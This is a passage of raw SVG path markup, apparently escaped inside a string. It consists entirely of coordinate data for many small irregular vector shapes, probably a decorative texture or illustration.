d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n <path d=\"M1107.8,76c1,.2,2.1.3,3.1.5-.1-.2-.1-.3-.2-.5C1107.9,75.5,1108.1,75.8,1107.8,76Z\"></path>\n <path d=\"M917.7,39.7c1.3,0,6.2.4,1.7-.5.8.4-.2.4-3-.2C916.7,39.2,916.3,39.4,917.7,39.7Z\"></path>\n <path d=\"M1102.9,67.5c-.7-.3.9-.4-1.3-.8.3.3-.7.2-3-.2.7.3-.9.4,1.3.8C1099.2,66.9,1100.9,67,1102.9,67.5Z\"></path>\n <path d=\"M918.2,36.5c-2-.3-3.9-.6-5.3-.9a5.19,5.19,0,0,0-1.1-.2c.3.1.7.2,1.1.3,1.6.4,3.9.9,5.5,1.3C918.3,36.9,918.3,36.7,918.2,36.5Z\"></path>\n <path d=\"M1115.1,66.7l-2.1-.3c-.6-.1-1.2-.2-1-.1,3,.6.4.6-.8.4,2.9.5,2.2.6,4.2.7C1114.3,67,1114.3,66.9,1115.1,66.7Z\"></path>\n <path d=\"M913.8,33.4c0-.4.4-.5-.8-.9a10.78,10.78,0,0,0-1.7-.4c-1.9-.2-.8.6,1.7,1.2A2.18,2.18,0,0,1,913.8,33.4Z\"></path>\n <path d=\"M915.7,33.3c2.7.4,4,.5,4,.2-1.4-.3-2.1-.5-4.2-.8A1.42,1.42,0,0,0,915.7,33.3Z\"></path>\n <path d=\"M926.2,32.9c-.1-.2,2.8.3,1.9-.1a41.72,41.72,0,0,0-4.3-.8Q923.8,32.3,926.2,32.9Z\"></path>\n <path d=\"M1105.1,61.9c2.6.4,5.6.4,1.8-.3C1106.6,61.8,1104.8,61.5,1105.1,61.9Z\"></path>\n <path d=\"M925.4,31.2c-3.5-.5-4-.3-4.9-.1,2,.3,2.4.5,4.2.8C924,31.3,923,31,925.4,31.2Z\"></path>\n <path d=\"M1109.9,61.9c-3.9-1,1.7-.2-2.4-1.1-1.1,0-1.1.3-1.7.5C1107.8,61.7,1108,61.6,1109.9,61.9Z\"></path>\n <path d=\"M1218.5,78.8c-1.6.1.8.6.5,1.1C1220.7,80.1,1220.3,79.2,1218.5,78.8Z\"></path>\n <path d=\"M1108.5,60.9c1.4.1,1.5-.4-1.4-.9C1107.8,60.3,1106.2,60.5,1108.5,60.9Z\"></path>\n <path d=\"M919.6,29.2c2.5.1-.3-1.3,3.5-.9,0-.3-1.8-.6-3.4-1C922.4,28.3,916,28.1,919.6,29.2Z\"></path>\n <path d=\"M934,30.9c-3-.3-6.8-.9-1.9.1.1.1.2.2,1.1.3C932.2,30.9,934.5,31.3,934,30.9Z\"></path>\n <path d=\"M929,28.6c.1.3-1.6.1-.7.5,2.6.5,5.1.9,5.1.6-1.2-.2-3-.5-3.2-.6S930.2,28.8,929,28.6Z\"></path>\n <path d=\"M921.6,27.2c1.8.1-.5-.5-3.4-1C918.8,26.5,918.8,26.8,921.6,27.2Z\"></path>\n <path d=\"M1203.4,73.4c-2.8-.5-3.4-.4-2.9,0a28.64,28.64,0,0,1,3.2.6C1203.4,73.7,1201.5,73.3,1203.4,73.4Z\"></path>\n <path d=\"M923.6,27.3c1.4.2,2.8.5,4.2.7l-.3-.6C923.6,26.7,922.9,26.8,923.6,27.3Z\"></path>\n <path d=\"M927.4,27.2c1.1-.1,3.3.2,3.9,0C928.4,26.7,924.4,26.4,927.4,27.2Z\"></path>\n <path d=\"M1211.4,74c1.4.2,2.3.4,3.2.6.1-.3-.5-.7-2.4-1.1C1212.6,73.9,1212.2,74,1211.4,74Z\"></path>\n <path d=\"M940.7,26.7c1.4.6.8.5-1.8.3a17.9,17.9,0,0,0-3.3-.9c1.6.8,4.8,1.3,2.6,1.4,1.3.3,2.9.6,5.3,1,.9-.3-4-.8-3.4-1.1a10.38,10.38,0,0,0,4,.3C941.3,27.3,944.8,27.2,940.7,26.7Z\"></path>\n <path d=\"M915.4,22.2c-.9,0-2.4.6,1.5,1.1C914.2,22.6,918.4,22.9,915.4,22.2Z\"></path>\n <path d=\"M916.9,17.2a5.13,5.13,0,0,0-2.4-1.1C913.7,16.1,913.7,16.7,916.9,17.2Z\"></path>\n <path d=\"M933.2,18.8a13,13,0,0,1-3.1-.4c2.8.8-1,.5-4-.2-1.1.2,7.2,1.5,7.4,1.3C929.7,18.8,936.9,19.5,933.2,18.8Z\"></path>\n <path d=\"M921.3,16.2c0,.3,3.1.8,4.4,1.2-.1-.2.4-.2.9-.2C923.7,16.8,923.8,16.5,921.3,16.2Z\"></path>\n <path d=\"M924.5,14.7c1.1.4.3.6,3.4,1.1C928,15.5,927.7,15.2,924.5,14.7Z\"></path>\n <path d=\"M921.5,12.4c3.3.6,3.2.3,2.9-.1C921.1,11.8,922.4,12.4,921.5,12.4Z\"></path>\n <path d=\"M915,11c-.5-.2-.7-.4-1.4-.7-.3-.1-.6-.2-1-.3-.1.1-.2.2-2-.1-.1.2,1,.5,3,.8Z\"></path>\n <path d=\"M917.9,8.8a14.08,14.08,0,0,1-4.2,0c-.5-.1-1-.1-1.7-.2a8.24,8.24,0,0,0,1.7.4,40.71,40.71,0,0,1,5.7,1C915.9,9,923,9.9,917.9,8.8Z\"></path>\n <path d=\"M936.8,41.2c-.7-.4-1.6-.7.8-.4-1-.3-3.5-.7-5.4-1.1C931.3,40,935.2,40.7,936.8,41.2Z\"></path>\n <path d=\"M960,57.7c-.9-.6.4-.5,1.7-.5-3.3-.6-6.5-1.3-8.6-1.9A54.15,54.15,0,0,1,960,57.7Z\"></path>\n <path d=\"M940.2,58.9c-6.6-1.5.2-1.1-4-2.3-1,.3.4,1.3-5.7.3,5.2.9-.8.3-.8.4,6.2,1.1,1.2,1.2,3.9,2.2-4.4-.7-2.1-.1-.7.7-5.1-1-3.2-.1-6-.4,11,2.5,1.7,2.2-.6,2.3.8.1,3,.7,4,.9-.2.2-7.4-.9-3.8,0,1.1.1.1-.4,3,.2.3.4.9,1-1.6.6,1.6.4,3.4.7,3.4,1a8.57,8.57,0,0,1-3.9-.1c1.8.2-1.3.6,1.3.7,6.9-.1,5.9,3.4-2.1,1.8.7.4,4.5,1,4.5,1.4-2.6-.2-2.3.3-5.9-.2.2.7,3.6,1.6-.4,1.3a39.83,39.83,0,0,0,5.2.8c1.2.5,3.4,1.2.4.8a13.18,13.18,0,0,0-5.4-1.1c2.7.7.4,1.2-.4,1.2,1.1.5,3.3.5,5.2.9a4.54,4.54,0,0,0,1.5.6l3.1.9a28.05,28.05,0,0,1-2.9,0c-1.2-.3-1.9-.6-2.8-.9a14.13,14.13,0,0,0-1.8-.5c.9.3.8.4.5.5s-1.3.1,0,.6c2.5.6,3.8.3,4.2.7-.5.5-3,.1-1.6.7,1.4.2,2.8.5,4.2.7.5-.5.1-.7.5-1,1.6.2,3.9.7,4.1.6-3.1-.8-3.9-1.9,2.5-.8,1.2.8.1.8.8,1.7,2.2.5,5.5,1.3,5.2.8-1.2-.2-3.9-.8-4.5-1.3,2.7,0,2.4-.9,1.1-1.7-1.6-.1.2.2.2.5-1.4-.2-2.3-.3-3.1-.4a7.85,7.85,0,0,1-1.6-.7,31.76,31.76,0,0,0-4.5-1.9c0-.6,5.5.6,5.8,0-6.4-1.2-5.1-1.5-4.9-2.1,1.1.2,2.1.4,3.2.5-2.9-.9,1.3-.5-3.8-1.9,1.4.2,2.3.3,3.1.4,2.9.7,4.9,2.9-.2,1.8,3.6,1.4,6.5,2.4,3.2,2.8,1.2.1,2.4.5,3.2.6a4.24,4.24,0,0,0,1,.1h-.1c-1.7-.8-2.1-1.4.4-1.4-5.7-1.2-3.5-1.8.3-1.4,0,.3.1.6,2.4,1,3.2-.1,4.4-.1-.7-1.6-.8.2,3.6,1.4.5,1.1a14.53,14.53,0,0,1-3.3-.9c2.4.1,1.4-.1.6-.7,4.6.9,2.7,0,5,.3-2.2-.6-4.4-.5-5.3-1.1,1-.3-2.7-1.3,1.5-1,1.7.4,2.1.8,4.5,1.3.4-.3-3.9-.9-3.5-1.2,2.8.5,2.6.2,2.9,0-3.7-1.2-1.1-1.7-6.2-3,2,.2,1.2-.3,2.8-.2-.2.2.5.5,2.3.8-4-1.3,1.1-1.4-6-2.6-.7-.6,6,.3,2.6-.7-.2.1.1.2-.9.1.1-.2-1.3-.5-1.3-.7,4.6.6-1.6-1.4,3.5-.9-4.3-.6-2.1-.8-4.5-1.3a30.26,30.26,0,0,0-5.2,1.4c-2.3-1.1-1.8-1.5-2.1-2.3C937.7,58.3,940.4,59.4,940.2,58.9Z\"></path>\n <path d=\"M926.2,62h.3C926.3,61.9,926.1,61.9,926.2,62Z\"></path>\n <path d=\"M913.6,49.6c1.7.1.9-.4-1-.9q-.6-.15-1.5-.3a6,6,0,0,1,1.5.5C912.9,49.1,912.2,49.1,913.6,49.6Z\"></path>\n <path d=\"M1035.1,69.6C1041.3,70.1,1032.4,67.8,1035.1,69.6Z\"></path>\n <path d=\"M1016,63.9c-.8.5,1.8,1.7,4.9,2.3C1017.9,65.4,1019.7,64.8,1016,63.9Z\"></path>\n <path d=\"M958.7,54.9c3,.4,3.2.4,6.3,1,1.3-.3-6.1-1.1-5.5-1.5.6.1,1.1.1-.1-.1C955.8,54.1,960.5,55,958.7,54.9Z\"></path>\n <path d=\"M968.6,55.7c-3.2-.6-3.8-.5-6.2-.9.3-.2,2.1-.3-1.4-.9-1.4-.1-.4.5-1.8.4,4.5.6,2.4.8,6.5,1.4C964,55,970.4,56.4,968.6,55.7Z\"></path>\n <path d=\"M990.8,59.6c2.6.2,1.8-.5.6-.8a7.46,7.46,0,0,1-2.1-.3C992,59.3,988.1,59,990.8,59.6Z\"></path>\n <path d=\"M928.4,46c-.7-.1-4.2-1-4.2-.7a15.58,15.58,0,0,1,3.3.8c0-.3,4.9.7,3.9.1A61.65,61.65,0,0,0,924,45C926.8,45.4,928.6,45.8,928.4,46Z\"></path>\n <path d=\"M917.2,42.7a32.38,32.38,0,0,0-4.4-.5,8.55,8.55,0,0,0-1.6,0,5.22,5.22,0,0,1,1.6.4,24.81,24.81,0,0,0,2.8.8c-.5-.3-1.5-.7-2.4-1.1C914.9,42.5,918.4,43.2,917.2,42.7Z\"></path>\n <path d=\"M932.9,45.2c.4-.2-3.1-1.1-3.3-.9,2.4.4.2.6,3.4,1.1,0-.3,4,.5,4,.2a21,21,0,0,1-2.2-.6C935.2,45.4,934.7,45.5,932.9,45.2Z\"></path>\n <path d=\"M927.4,43.8a45.32,45.32,0,0,1-7.4-1.3c-.8.3-.2.5,2.5,1.2a17.9,17.9,0,0,1,4,.3,1.83,1.83,0,0,0,1.1.2C925.7,43.9,927.7,44.1,927.4,43.8Z\"></path>\n <path d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n <path 